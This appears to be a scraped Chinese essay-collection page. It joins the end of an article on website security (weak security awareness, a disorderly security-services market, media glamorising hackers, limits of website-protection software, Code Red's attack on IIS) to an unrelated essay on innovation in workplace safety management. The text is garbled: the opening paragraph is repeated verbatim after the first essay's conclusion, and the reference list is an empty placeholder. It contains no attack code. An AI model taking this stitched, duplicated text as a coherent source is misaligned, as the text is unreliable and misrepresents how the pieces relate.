网络信息安全研究的人员认为这首先是没有安全意识。北京中联绿盟公司副总经理高永安说,一些网站认为他们的公司还小,不会成为黑客攻击的目标,即使被黑也不会有什么损失。广州京九公司总经理万涛认为,信息安全来自三个方面:技术、管理和学习,加强信息安全不能光做技术,还要重视内部管理和人员培养。而一些网络安全公司的不负责态度,也据估计不利于中国信息安全的提高。据分析,中国信息安全市场容量将达到1000亿元,目前从事信息安全服务的公司已超过一百家,但是市场却相当混乱。有些安全公司为了获得业务,甚至刻意地寻找甚至制造一些网络公司的系统漏洞,然后以此为筹码与网络公司谈判。一些媒体的片面报道,也可能产生不利的影响。据最近在广州进行的一次调查显示,4%的小学生希望成为黑客。媒体报道黑客事件时有两个倾向,一是玄化,将信息安全和黑客说得神乎其神;二是美化,将黑客塑造成英雄和偶像来崇拜。因此媒体必须加强引导,不要盲目地炒作黑客行为,更不能鼓吹黑客的破坏性。
可见,国内网站安全存在必然隐患的问题必须得以正视。尽管网站保护软件能进一步提高系统的安全,仍然存在一些缺陷。首先这些保护软件都是针对静态页面而设计,而现在动态页面占据的范围越来越大,尽管本地监测方式可以检测脚本文件,但对脚本文件使用的数据库却无能为力。
另外,有些攻击并不是针对页面文件进行的,前不久泛滥成灾的”Red Code"就是使用修改IIS服务的一个动态库来达到攻击页面的目的。另一个方面,网站保护软件本身会增加WWW服务器的负载,在WWW服务器负载本身已经很重的情况下,一定好仔细规划好使用方案
结束语
本文侧重在网站安全方面来谈,讨论了网站常用的保护方法,详细地分析比较了专用网站保护软件采用的各种技术实现和优缺点,并指出了其缺陷。安全虽不是使用某个工具或某些工具就可以解决的,但使用这些工具能帮助提高安全性,减少安全风险。只有更好 29 的保障网站的安全,才能便于网站的管理。
网络信息安全研究的人员认为这首先是没有安全意识。北京中联绿盟公司副总经理高永安说,一些网站认为他们的公司还小,不会成为黑客攻击的目标,即使被黑也不会有什么损失。广州京九公司总经理万涛认为,信息安全来自三个方面:技术、管理和学习,加强信息安全不能光做技术,还要重视内部管理和人员培养。而一些网络安全公司的不负责态度,也据估计不利于中国信息安全的提高。据分析,中国信息安全市场容量将达到1000亿元,目前从事信息安全服务的公司已超过一百家,但是市场却相当混乱。有些安全公司为了获得业务,甚至刻意地寻找甚至制造一些网络公司的系统漏洞,然后以此为筹码与网络公司谈判。一些媒体的片面报道,也可能产生不利的影响。据最近在广州进行的一次调查显示,4%的小学生希望成为黑客。媒体报道黑客事件时有两个倾向,一是玄化,将信息安全和黑客说得神乎其神;二是美化,将黑客塑造成英雄和偶像来崇拜。因此媒体必须加强引导,不要盲目地炒作黑客行为,更不能鼓吹黑客的破坏性。
参考文献
主要参考文献: „„„„„„
第五篇:浅析安全管理与创新
浅析安全管理与创新
创新、创造是企业发展的主题,也是前进的源动力;一个企业没有了创新就像汪洋中的一条船,失去了动力在原地打转是十分危险的;而安全又是企业生存发展的基础,企业的创新、创造,也就意味着安全管理的手段、模式、技术等方面不能一成不变,也必须紧跟上时代发展的步伐。
1.宣传手段创新.现在一提到安全宣传,大家首先想到的是挂横幅、看录像、办黑板报展评等等,这些宣传手段是最基本的、传统的、行之有效的。但是,随着社会的发展,人员素质的提高,科技的进步,特别是年轻员工的加入,这些传统的宣传手段已不能满足安全信息的传播、传递;人们需要更新、更快的宣传载体,渴求更新鲜、更丰富的宣传内涵的加入。现在电脑、智能手机已经非常普及,网络、WIFI信号也到处覆盖,安全宣传完全可以借助微信、QQ、电子邮件等工具给员工发送有教育意义的安全短信、视频,或者生日问候、安全提醒等 ;成本少,但宣传面却很广、很快,效果迥异。
另外,常见的安全宣传口号总是“安全第一,预防为主”、“安全责任重于泰山”这几句,如果能够增加一些如“爱妻爱子爱家庭,出了事故等于零”、“见了违章严批评,道是无情却有情”、“与其事后痛苦流涕,不如事前遵章守纪”等更人性化的口号,肯定会引起更多员工的关注和共鸣。
2.管理模式创新.安全检查一直是安全管理的基本方法;什么专项检查、综合检查、节前节后检查等等;这些是必须的,也是必要的;但这只是从管理层角度出发的一种行为,是单向的,被查员工往往有抵触情绪;怎么样能让员工自己主动地去自查自纠存在的隐患和违章,从被动安全转变为主动安全呢?俗话说“群众的眼睛是雪亮的”,能否对员工设立隐患举报奖励机制,调动员工查隐患的积极性;对确认的隐患,给予举报者奖励,并及时整改;让隐患和违章象过街老鼠一样,人人喊打,使其失去存在的土壤。
目前公司的监控视频只安装在保安室,对现场安全生产的监督意义不大;能否让部门、基地工厂的负责人、安全管理员也安装监控软件,打开电脑就能看到重点部位、关键工序的作业画面,有利于及时发现生产异常和违章行为,充分发挥视频监控的作用,弥补现场检查的不足,转变等别人汇报安全问题的模式,这在现在是不难做到的事情;对于8小时之外、加班时间的监管,同样也可以借鉴使用此方法。
3.安全技术创新.安全是生产力!安全工作是科学性的体现;本质安全,是安全技术的目标追求!在安全工作中,科技含量越高,安全严谨性就越大;企业安全除了严格管理更需要技术创新;企业要发展就必须不断地加大对新设备的投入、新技术的研发;淘汰安全隐患大、生产效率低的设备和工艺,全面推动企业转型升级,改善工作环境,降低员工劳动强度,努力给员工创造一个安全、稳定的工作环境;有了安全技术创新,企业才有免疫力,才能不断增强竞争力,才能在市场上始终处于领先地位!
安全管理工作要与时俱进,不断创新,最大限度地消除事故隐患,减少事故发生,保障人身安全、财产安全。
安全管理将伴随着公司的创新、创造,永续美好的未来!
点击咨询 